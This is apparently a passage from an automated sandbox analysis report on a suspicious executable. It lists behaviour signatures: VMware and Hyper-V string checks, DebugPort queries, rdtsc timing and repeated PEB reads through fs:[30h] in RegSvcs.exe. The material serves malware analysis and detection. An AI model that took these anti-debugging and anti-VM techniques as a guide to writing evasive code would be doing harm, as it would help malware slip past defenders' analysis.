          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000000.286069464.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409A90 rdtsc 5_2_00409A90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0040ACD0 LdrLoadDll,5_2_0040ACD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F158EC mov eax, dword ptr fs:[00000030h]5_2_00F158EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F2AAB0 mov eax, dword ptr fs:[00000030h]5_2_00F2AAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F4FAB0 mov eax, dword ptr fs:[00000030h]5_2_00F4FAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]5_2_00F152A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]5_2_00F152A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]5_2_00F152A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]5_2_00F152A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]5_2_00F152A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F4D294 mov eax, dword ptr fs:[00000030h]5_2_00F4D294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F4D294 mov eax, dword ptr fs:[00000030h]5_2_00F4D294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F5927A mov eax, dword ptr fs:[00000030h]5_2_00F5927A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FCB260 mov eax, dword ptr fs:[00000030h]5_2_00FCB260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FCB260 mov eax, dword ptr fs:[00000030h]5_2_00FCB260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE8A62 mov eax, dword ptr fs:[00000030h]5_2_00FE8A62
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FDEA55 mov eax, dword ptr fs:[00000030h]5_2_00FDEA55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FA4257 mov eax, dword ptr fs:[00000030h]5_2_00FA4257
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]5_2_00F19240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]5_2_00F19240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]5_2_00F19240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]5_2_00F19240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F54A2C mov eax, dword ptr fs:[00000030h]5_2_00F54A2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F54A2C mov eax, dword ptr fs:[00000030h]5_2_00F54A2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F15210 mov eax, dword ptr fs:[00000030h]5_2_00F15210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F15210 mov ecx, dword ptr fs:[00000030h]5_2_00F15210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F15210 mov eax, dword ptr fs:[00000030h]5_2_00F15210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F15210 mov eax, dword ptr fs:[00000030h]5_2_00F15210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F1AA16 mov eax, dword ptr fs:[00000030h]5_2_00F1AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F1AA16 mov eax, dword ptr fs:[00000030h]5_2_00F1AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F33A1C mov eax, dword ptr fs:[00000030h]5_2_00F33A1C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F28A0A mov eax, dword ptr fs:[00000030h]5_2_00F28A0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F3DBE9 mov eax, dword ptr fs:[00000030h]5_2_00F3DBE9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F953CA mov eax, dword ptr fs:[00000030h]5_2_00F953CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F953CA mov eax, dword ptr fs:[00000030h]5_2_00F953CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F44BAD mov eax, dword ptr fs:[00000030h]5_2_00F44BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F44BAD mov eax, dword ptr fs:[00000030h]5_2_00F44BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F44BAD mov eax, dword ptr fs:[00000030h]5_2_00F44BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE5BA5 mov eax, dword ptr fs:[00000030h]5_2_00FE5BA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F42397 mov eax, dword ptr fs:[00000030h]5_2_00F42397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F4B390 mov eax, dword ptr fs:[00000030h]5_2_00F4B390
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD138A mov eax, dword ptr fs:[00000030h]5_2_00FD138A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FCD380 mov ecx, dword ptr fs:[00000030h]5_2_00FCD380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F21B8F mov eax, dword ptr fs:[00000030h]5_2_00F21B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F21B8F mov eax, dword ptr fs:[00000030h]5_2_00F21B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F43B7A mov eax, dword ptr fs:[00000030h]5_2_00F43B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F43B7A mov eax, dword ptr fs:[00000030h]5_2_00F43B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F1DB60 mov ecx, dword ptr fs:[00000030h]5_2_00F1DB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE8B58 mov eax, dword ptr fs:[00000030h]5_2_00FE8B58
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F1F358 mov eax, dword ptr fs:[00000030h]5_2_00F1F358
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F1DB40 mov eax, dword ptr fs:[00000030h]5_2_00F1DB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD131B mov eax, dword ptr fs:[00000030h]5_2_00FD131B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD14FB mov eax, dword ptr fs:[00000030h]5_2_00FD14FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]5_2_00F96CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]5_2_00F96CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]5_2_00F96CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE8CD6 mov eax, dword ptr fs:[00000030h]5_2_00FE8CD6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F2849B mov eax, dword ptr fs:[00000030h]5_2_00F2849B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F3746D mov eax, dword ptr fs:[00000030h]5_2_00F3746D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FAC450 mov eax, dword ptr fs:[00000030h]5_2_00FAC450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FAC450 mov eax, dword ptr fs:[00000030h]5_2_00FAC450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F4A44B mov eax, dword ptr fs:[00000030h]5_2_00F4A44B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F4BC2C mov eax, dword ptr fs:[00000030h]5_2_00F4BC2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]5_2_00FE740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]5_2_00FE740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]5_2_00FE740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]5_2_00F96C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]5_2_00F96C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]5_2_00F96C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]5_2_00F96C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FC8DF1 mov eax, dword ptr fs:[00000030h]5_2_00FC8DF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]5_2_00F2D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]5_2_00F2D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]5_2_00FDFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]5_2_00FDFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]5_2_00FDFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]5_2_00FDFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F96DC9 mov eax, dword ptr fs:[00000030h]5_2_00F96DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F96DC9 mov eax, dword ptr fs:[00000030h]5_2_00F96DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F96DC9 mov eax, dword ptr fs:[00000030h]5_2_00F96DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F96DC9 mov ecx, dword ptr fs:[00000030h]5_2_00F96DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F96DC9 mov eax, dword ptr fs:[00000030h]5_2_00F96DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F96DC9 mov eax, dword ptr fs:[00000030h]5_2_00F96DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]5_2_00F41DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]5_2_00F41DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]5_2_00F41DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE05AC mov eax, dword ptr fs:[00000030h]5_2_00FE05AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE05AC mov eax, dword ptr fs:[00000030h]5_2_00FE05AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F435A1 mov eax, dword ptr fs:[00000030h]5_2_00F435A1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F4FD9B mov eax, dword ptr fs:[00000030h]5_2_00F4FD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F4FD9B mov eax, dword ptr fs:[00000030h]5_2_00F4FD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F42581 mov eax, dword ptr fs:[00000030h]5_2_00F42581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F42581 mov eax, dword ptr fs:[00000030h]5_2_00F42581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F42581 mov eax, dword ptr fs:[00000030h]5_2_00F42581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F42581 mov eax, dword ptr fs:[00000030h]5_2_00F42581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F3C577 mov eax, dword ptr fs:[00000030h]5_2_00F3C577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F3C577 mov eax, dword ptr fs:[00000030h]5_2_00F3C577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F37D50 mov eax, dword ptr fs:[00000030h]5_2_00F37D50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F53D43 mov eax, dword ptr fs:[00000030h]5_2_00F53D43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F93540 mov eax, dword ptr fs:[00000030h]5_2_00F93540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F1AD30 mov eax, dword ptr fs:[00000030h]5_2_00F1AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FDE539 mov eax, dword ptr fs:[00000030h]5_2_00FDE539
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE8D34 mov eax, dword ptr fs:[00000030h]5_2_00FE8D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F9A537 mov eax, dword ptr fs:[00000030h]5_2_00F9A537
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]5_2_00F44D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]5_2_00F44D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]5_2_00F44D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F276E2 mov eax, dword ptr fs:[00000030h]5_2_00F276E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F416E0 mov ecx, dword ptr fs:[00000030h]5_2_00F416E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE8ED6 mov eax, dword ptr fs:[00000030h]5_2_00FE8ED6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F58EC7 mov eax, dword ptr fs:[00000030h]5_2_00F58EC7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F436CC mov eax, dword ptr fs:[00000030h]5_2_00F436CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FCFEC0 mov eax, dword ptr fs:[00000030h]5_2_00FCFEC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE0EA5 mov eax, dword ptr fs:[00000030h]5_2_00FE0EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE0EA5 mov eax, dword ptr fs:[00000030h]5_2_00FE0EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE0EA5 mov eax, dword ptr fs:[00000030h]5_2_00FE0EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F946A7 mov eax, dword ptr fs:[00000030h]5_2_00F946A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FAFE87 mov eax, dword ptr fs:[00000030h]5_2_00FAFE87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F3AE73 mov eax, dword ptr fs:[00000030h]5_2_00F3AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F3AE73 mov eax, dword ptr fs:[00000030h]5_2_00F3AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F3AE73 mov eax, dword ptr fs:[00000030h]5_2_00F3AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F3AE73 mov eax, dword ptr fs:[00000030h]5_2_00F3AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F3AE73 mov eax, dword ptr fs:[00000030h]5_2_00F3AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F2766D mov eax, dword ptr fs:[00000030h]5_2_00F2766D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F27E41 mov eax, dword ptr fs:[00000030h]5_2_00F27E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F27E41 mov eax, dword ptr fs:[00000030h]5_2_00F27E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F27E41 mov eax, dword ptr fs:[00000030h]5_2_00F27E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F27E41 mov eax, dword ptr fs:[00000030h]5_2_00F27E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F27E41 mov eax, dword ptr fs:[00000030h]5_2_00F27E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F27E41 mov eax, dword ptr fs:[00000030h]5_2_00F27E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FDAE44 mov eax, dword ptr fs:[00000030h]5_2_00FDAE44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FDAE44 mov eax, dword ptr fs:[00000030h]5_2_00FDAE44
